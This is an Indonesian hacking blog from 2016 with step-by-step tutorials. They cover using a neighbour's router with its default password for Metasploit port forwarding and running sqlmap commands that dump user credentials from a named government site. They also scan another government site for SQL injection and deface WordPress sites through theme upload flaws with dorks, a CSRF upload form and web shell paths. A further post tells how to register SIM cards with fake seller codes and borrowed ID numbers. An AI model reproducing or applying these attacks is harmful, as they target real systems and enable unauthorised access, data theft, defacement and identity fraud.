Selasa, 29 Maret 2016

Setting Port Forwarding Modem Router Speedy N ADSL2+



Hallo semuanya kembali lagi bersama saya OepilCore , kwkwkw setelah sekian lama bersembunyi di goa untuk mendapatkan inspirasi akhirnya baru dapet ide buat share how to port forward modem router adsl2+ speedy kwkwkw XD

untuk mastah mastah , yuukk melipir dulu :3 XD  , kwkwkw ...
dan bagi kalian yang belum tau apa ajah kegunaan port forwarding itu bisa di cek di google yak , dan apa ajah sih jenis port forward itu ,
kalo gua make port forward itu buat metasploit Android ataupun Windows di luar jaringan

udah ah daripada banyak basa basi kwkwkw~ langsung ke tutorialnya ajah ,
yuk ahh~




Yuk ah mari di intips dulu :3




oke pertama-tama , kalian harus login dulu ke modem router kalian .. disini saya make modem router tetangga saya alhamdulillah passwordnya masih default :3 






nahh setelah login , kalian langsung masuk ke tab Advanced Setup,







sesudah dari sini , klik virtual server




Udah kan :3 , nahh disini kalian pilih CUseeMe , di column application , tapi yang disebelahnya ya,



sesudah dipilih tinggal kalian atur deh local ip address nya di isi dengan ip local kalian ,
dan setting portnya juga sesuka hati kalian :3 kalo kalian make buat metasploit , ya portnya harus disamain nanti ama backdoor dan exploitnya kwkwkw :3





nahh simple dan mudah bukan ? :3
kwkwkw kalo udah tinggal kalian save deh , dan tinggal kalian cobain deh nongol gak tuh nanti meterpreternya kwkwkw XD :3






oke oke oke , semuanya sekian dulu dari gua wkwkw~ kurang lebihnya mohon maaf , karena disini gua juga masih belajar sama seperti kalian , karena kita bisa dan terbiasa karena belajar ... yoookkss semuanya sampai bertemu di pertemuan berikutnya dan jangan lupa mangaapp :v  kwkwkkw *Candaa .

sebelum gua pamit .. 

gua ingin mengucapkan Terimakasih yang terbesar-besarnya kepada :

Backbox Linux Indonesia

Linuxsec.org
 
om O.W.L ,
om Jack Wilder ,




salam para penjinak pinguin


bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kamiTKJ CYBER ART

Happy Pentesting and Metas awkkawaw.
Sekian dan semoga bermanfaat .. terimakasih


#OepilCore








Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2

Minggu, 20 Maret 2016

Tutorial Exploitation Sqlmap $POST di Linux

sampai kapan ?!

Hello Fans .-. Nuenomaru disini.
Sesuai judulnya, gua bakal Share Tutorial Exploitation Sqlmap $POST di Linux.
di tutorial ini Nue bakal praktekin di Kali Linux di leppy nue, silahkan di coba di Linux2 kesayangan anda.
SQLMAP .. apa itu SQLMAP ? 
Sqlmap adalah tools opensource yang mendeteksi dan melakukan exploit pada bug SQL injection secara otomatis. dengan melakukan serangan SQL injection.

kali ini ane akan ngebahas tentang.. cara exploitasi website ber bug Sql Injection $POST ..  

ok langsung kita mulai aja..


intip tutorialnya bebz ;*

target : http://datanusantara.lemhannas.go.id/home/login
$POST : login_param=1&username=dsdsads&password=dasdsa&security_code=0499
bug : password

1. Scanning Database
sqlmap -u http://datanusantara.lemhannas.go.id/home/login --"data=login_param=1&username=dsdsads&password=dasdsa&security_code=0499" -p "password" --dbs


nah keluarkan list database nya ..

rincian:

perintah sqlmap : perintah untuk memanggil/menjalankan sqlmap
perintah -u : untuk menentukan target/site
perintah --data= : untuk menentukan $POST pada target
perintah -p : untuk menentukan parameter post manakah yang vuln
perintah --dbs : untuk mencollect Database / scanning database

2. Scanning Tables on Database

Ketika kita sudah mendapatkan list DBnya.. lalu kita scanning tables yang ada didalamnya..

sqlmap -u http://datanusantara.lemhannas.go.id/home/login --"data=login_param=1&username=dsdsads&password=dasdsa&security_code=0499" -p "password" -D risphate_sisdatadb --tables


rincian :

--tables : untuk menscanning table yang ada di dalam database yang kita pilih..
formatnya:
namadatabase -D namatablenya --tables

-D sendiri adalah sama untuk mendeteksi database yang kita pilih untuk mendapatkan tablenya..

3. Scanning Columns on Tables

setelah kita mendapatkan database dan tables nya.. sekarang kita coba collect lebih dalam lagi.. yaitu kita scann columnya..

sqlmap -u http://datanusantara.lemhannas.go.id/home/login --"data=login_param=1&username=dsdsads&password=dasdsa&security_code=0499" -p "password" -D risphate_sisdatadb -T tbl_pengguna --columns


rincian:

--columns adalah perintah untuk mencollect column yg berada di dalam tables..
untuk menentukan tables yang ingin kita dump columnya ketikan perintah..

-D nama database -T namatablesnya --column

4. DUMP data

akhirnya kita telah mencapai ke penghujung acara hehe...
saatnya kita sedot datanya , siapa tau ada data penting ye gak ? :v

sqlmap -u http://datanusantara.lemhannas.go.id/home/login --"data=login_param=1&username=dsdsads&password=dasdsa&security_code=0499" -p "password" -D risphate_sisdatadb -T tbl_pengguna -C username,password --dump

[Image: KaSRixl.png]

Jika ada pertanyaan seperti di atas.. itu ada lah pertanyaan " apakah kamu mau crack password di atas via dictionary based ?"
intinya ente mau di crack otomatis gak ? pake wordlist yg di sediakan sqlmap ? jika iya ketik Y / enter saja
jika tidak ketik N..


Taraa.. data pun ter dump..

kalian bisa juga mengcrack nya di HashKiller.co.uk

Baca Juga yak:
Scan vuln SQL Injection menggunakan NMAP di Linux
Tutorial Carding dengan SQL Map

Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")

Salam para penjinak pinguin :v , Penunggang Naga,  Viva Real Tux Warrior Gaes :'v wkkwkwkw


bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kamiTKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')

Happy Pentesting and suntikan awkkawaw.
Sekian dan semoga bermanfaat .. terimakasih

Aloo Gengs, sekarang waktunya Nue dan tim katakan Putus cabut dulu Gengs...
karna bsk udah Mulai Ujian Akhir Sekolah Gengs.. akawkwa
Bye..






source and thanks to: KCnewbie | Forum BackBox Indonesia




./Nuenomaru








Topi kebelakang, Mata ku jauh Menatap KeDepan ;)

















Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2

Kamis, 17 Maret 2016

Cara Mengakali ID Penjual Kartu Perdana


Hai Guys, Gua Init.N, karna US dah kelar *tinggal minggu bsk nih ada UAS awkkaw* , gua sempetin untuk nyumbang sebuah post *maaf kalo cupu* .
disini gua bakal Share tips bagi elo yang beli kartu perdana tapi Mager banget untuk aktivasi ke konter.
Ya karna kali ini gua bakal Share CARA MENGAKALI ID PENJUAL KARTU PERDANA / Cara Registrasi Kartu Perdana Sendiri tanpa harus ke Konter .

1. Yang pasti ente udh beli perdana dari konter/tmpt jual kartu perdana.
2. Cara ini hanya untuk agan yg mungkin ga bawa ktp/males balik lagi cman buat ngambil ktp dirumah, kalo engga udh kebawa kesel ama penjaga konter yg jutek awkawk :v
3. Berlaku untuk kartu perdana XL, AXIS, TSEL, IndosatOoredo, dan 3.
4. Kode penjual (random gan, ente cobain satu” aja)
SY020
JK382
ML565
TA424

Langsung aje gan, ini stepnya :


1. Masukkan simcard yg ente baru beli dari konter
2. Registrasi via sms dengan ketik DAFTAR kirim ke 4444 (gua make axis, jadi kalo perdana lain mungkin kirimnya ke hati gua aja haha //galucu)
3. Lalu kirim biodata anda sesuai format balasan dari 4444
4. Setelah agan mengirim data agan, akan ada sms balasan lagi untukmebalas sms si 4444 5. dengan kode penjual, (ID#KODE PENJUAL) 
6. Di sini gue make id JK382, jadi balasnya : ID#JK382
7. Done^^

Tested on AXIS :

SS live praktek dari hp gua

NB: bagi kalian yang blm punya KTP / para abeabean dibawah umur yg sering ganti kartu, silahkan ente liat google aja Nomor KTP mah awkwakakw.

Sekian guys postingan ringan dari Gua.
Semoga bermanfaat.

Bila ada Kesalahan langsung komen aja di bawah, Bila ada Kritikan, Saran, atau Pertanyaan Langsung aja Ke FansPage Kami: TKJ Cyber Art






Init.N

























Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2

Senin, 14 Maret 2016

Scan vuln SQL Injection menggunakan NMAP di Linux


xixihi , malam fans .-. Nuenomaru disini.
Sesuai judulnya, kali ini gua bakal share Tutorial Scan vuln SQL Injection menggunakan NMAP di Linux , di tutorial ini Nue bakal praktekin di Kali Linux di leppy nue, silahkan di coba di Linux2 kesayangan anda.

lanjut tutorialnya

ketikan: 

nmap -sV --script=http-sql-injection www.target.com -Pn -p 80

keterangan :
-sV : untuk mendeteksi versi pada sistem operasi
--script : untuk memanggil script nmap yang akan di gunakan (untuk mencari script nmap yang lain nya ketik locate *.nse)
-Pn : untuk melewati proses identifikasi host yang sedang hidup (no ping)
-p : port yang digunakan

disini saya akan test situs http://www.depkes.go.id

ketikan:

nmap -sV --script=http-sql-injection www.depkes.go.id -Pn -p 80



Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-10 03:01 EST
Nmap scan report for www.depkes.go.id (202.70.136.4)
Host is up (0.026s latency).
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.15 ((Oracle))
|_http-server-header: Apache/2.2.15 (Oracle)
| http-sql-injection: 
|   Possible sqli for queries:
|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
|     http://www.depkes.go.id/?pg=profil_kesehatan_provinsi%27%20OR%20sqlspider&act=page
|     http://www.depkes.go.id/pdf.php?id=a01%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
|     http://www.depkes.go.id/?pg=profil_kesehatan_provinsi%27%20OR%20sqlspider&act=page
|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
|     http://www.depkes.go.id/pdf.php?id=16030500001%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
|_    http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 71.95 seconds



nah ternyata pada situs tersebut terdapat vulneralbility sql injection, untuk memastikan nya kita buka browser lalu copas salah satu link vuneralbility nya
contoh :

http://www.depkes.go.id/index.php?lg=LN01

tambahkan kutip pada akhir alamat url, dan ini hasil nya.




ini saya buat video nya juga cekidoot


Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")

Salam para penjinak pinguin :v , Penunggang Naga,  Viva Real Tux Warrior Gaes :'v wkkwkwkw



bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kamiTKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')

Happy Pentesting and suntikan awkkawaw.
Sekian dan semoga bermanfaat .. terimakasih

Aloo Gengs, sekarang waktunya Nue dan tim katakan Putus cabut dulu Gengs...
karna bsk udah Mulai Ujian Sekolah Gengs.. akawkwa
Bye..






source and thanks to: Forum BackBox Indonesia






./Nuenomaru





Topi kebelakang, Mata ku jauh Menatap KeDepan ;)




















Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2

Minggu, 13 Maret 2016

Information Gathering Menggunakan WhatWeb di Linux

sampe kapan?! awkkaw

Malam Fans .-. Nuenomaru disini.
mumpung ini hari Minggu, dan bsk dah mulai Ujian Sekolah lg, gua sempetin buat share salah satu tutorial ini. *baroo dpt sih dari forum sebelah..
yupz kali ini gw bakal Share Salah satu cara menggunakan WhatWeb di Linux , kali ini Nue bakal praktekin di Kali Linux kesayangan wkwkw *silahkan coba di linux2 yg anda pakek wkwkw.

apa itu WhatWeb x_O ?
WhatWeb berguna untuk Performance tuning. dengan cara Mengontrol berapa banyak situs untuk memindai secara bersamaan...
masih gk ngerti ?? ._.

oh ok gpp hehe emang gua dengernya pertama juga gitu bingung.. hehehe..
ane jelasin lebih spesifik..

sesuai namanya WHAT WEB.. atau What this is web ? ..
apa sih web ini ? web ini web apa..?
jadi inti nya what web ini berguna untuk memberikan informasi / berikan perincian dari website tersebut..
seperti.. jenis CMS , Type CMS, Versi CMS, Plugin apa, versi Mysql dll...

Jika kita ingin mengidentifikasi Web mencari informasi nya dengan what web... 
*mungkin bisa dikembangin buat bahan socengan awkawkw.


Play with Me ,Baby ;*

1. Open Ur Tools Brow..

buka tools whatweb nya..
atau bisa menggunakan perintah ..

whatweb


2. Swinggg.. Ur Weapon Heroo...

lalu layangkan pedangnya.. 
hehe maksudnya jalankan scriptnya dengan cara mengetikan perintah..

whatweb www.websitenya.com



Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")

Salam para penjinak pinguin :v , Penunggang Naga,  Viva Real Tux Warrior Gaes :'v wkkwkwkw


bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kamiTKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')

Happy Pentesting..
Sekian dan semoga bermanfaat .. terimakasih

Aloo Gengs, sekarang waktunya Nue dan tim katakan Putus cabut dulu Gengs...
karna bsk udah Mulai Ujian Sekolah Gengs.. akawkwa
Bye..






source and thanks to: kcnewbie | Forum BackBox Indonesia





./Nuenomaru








Topi kebelakang, Mata ku jauh Menatap KeDepan ;)



















Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2

Sabtu, 12 Maret 2016

Deface dengan Exploit WP-Store Upload Vulnerability


Selamat Malam fans .-. Nuenomaru disini.
ciee malming, gak ngapel gengs ?? , malah sibuk nyari exploit lo gengs wkawkawk
Di postingan sebelumnya Nue share salah satu Bug/Celah theme CMS WordPress, bisa di baca di: Deface dengan WordPress Anthology Themes Remote File Upload Vulnerability

Dan di postingan kali ini masih sama kok, kita bakal masih share salah satu Bug/Celah theme CMS Wordpress, yaitu Tutorial Exploit WP-STORE Upload Vulnerability*ini exploit lama sih akwwkakwa.
iseng2 aja share, kali aja masih crotz wkwkw.
Lanjotz intip tutorialnya omz
edited by: Yiyyop Story

Dork :
inurl:/wp-content/themes/WPstore/

WPStore
eShop
KidzStore
Emporium
Store
eCommerce
framework
frameworkold
Theme bisa diganti *ganti pada bagian belakangnya itu lho*

1. Dorking Menggunakan SearchEngine

2. pilih salah satu web target yg pengen ente tusb0l pak wkwk, lalu masukan exploitnya.
exploit: target.co.li/wp-content/themes/WPStore/upload/
3. Vulnerability ~ Muncul tempat Upload

Vuln Boss

4. Langsung aja deh Upload File/Shell lo gengs awkkwa


Shell Created!


Jika upload sudah selesai, langsung aja panggil Shell kesayangan lo tadi gengs.

5. Shell Akses: target.co.li/wp-content/uploads/products_img/namashell.php

gimana mau PHP , HTML aja masih blom bisa


Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kamiTKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')

Happy WordPress Hacked !!
Sekian dan semoga bermanfaat .. terimakasih


Aloo Gengs, sekarang waktunya Nue dan tim katakan Putus cabut dulu Gengs...

Kunjungin juga thread gue gengsForum BackBox Indonesia



source and thanks to: Gantengers Crew




./Nuenomaru




Topi kebelakang, Mata ku jauh Menatap KeDepan ;)


















Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2

Kamis, 10 Maret 2016

Deface dengan WordPress Anthology Themes Remote File Upload Vulnerability

Hallo fans .-. Nuenomaru disini.
Di postingan kali ini Nue akan Share Tutorial Exploit WordPress Anthology Themes Remote File Upload Vulnerability *ini exploit lama sih akwwkakwa.
iseng2 aja share, kali aja masih crotz wkwkw.
yupz ini adalah salah satu Bug/Celah yang ada pada theme CMS WordPress.



Lanjotz tutorial omz.
Dork: 
inurl:/wp-content/themes/Anthology/
(sisanya kembangin lagi, gunakan imajinasi vokever kalian, biar bisa dpt yang vuln and verawan).


1. Dorking dengan menggunakan SearchEngine

2. pilih salah satu web target yg pengen ente tusb0l pak wkwk, lalu masukan exploitnya.
exploit: target.co.li/wp-content/themes/Anthology/functions/upload-handler.php

3. Vulnerability ~ Muncul tulisan error atau Blank *kira2 sih gitu akkwakw *maap kalo salah <(")



vuln boss

Copy Script CSRF Upload nya:

<form enctype="multipart/form-data" 
action="target.co.li/wp-content/themes/Anthology/functions/upload-handler.php" method="post">
Please choose a file: <input name="pexetofile" type="file" /><br />
<input type="submit" value="upload" />
</form>

*save dgn ekstensi .html & ubah target.co.li jadi target yang mau lo tusbol


jika sudah buka CSRF Upload nya, lalu upload deh file/shell kalian.


Jika Upload nya sukses nanti akan muncul nama file/shell kalian gengs :3


sukses gengs :v

waktunya kita buka shell/file kita, gimana caranya o.O ?

Shell Akses: target.co.li/wp-content/uploads/[year]/[month]/namashell.php

Done x_O ,, faktor muka lah :)

Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kamiTKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')

Happy WordPress Hacked !!
Sekian dan semoga bermanfaat .. terimakasih


Aloo Gengs, sekarang waktunya Nue dan tim katakan Putus cabut dulu Gengs...
soalnya bsk masih ada Ujian Sekolah awkakwwa.
Bye..


Kunjungin juga thread saya gengs: Forum BackBox Indonesia



source and thanks to: web archive 1337days







./Nuenomaru




Topi kebelakang, Mata ku jauh Menatap KeDepan ;)

















Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2

 

ande ande lumoet Template by Ipietoon Cute Blog Design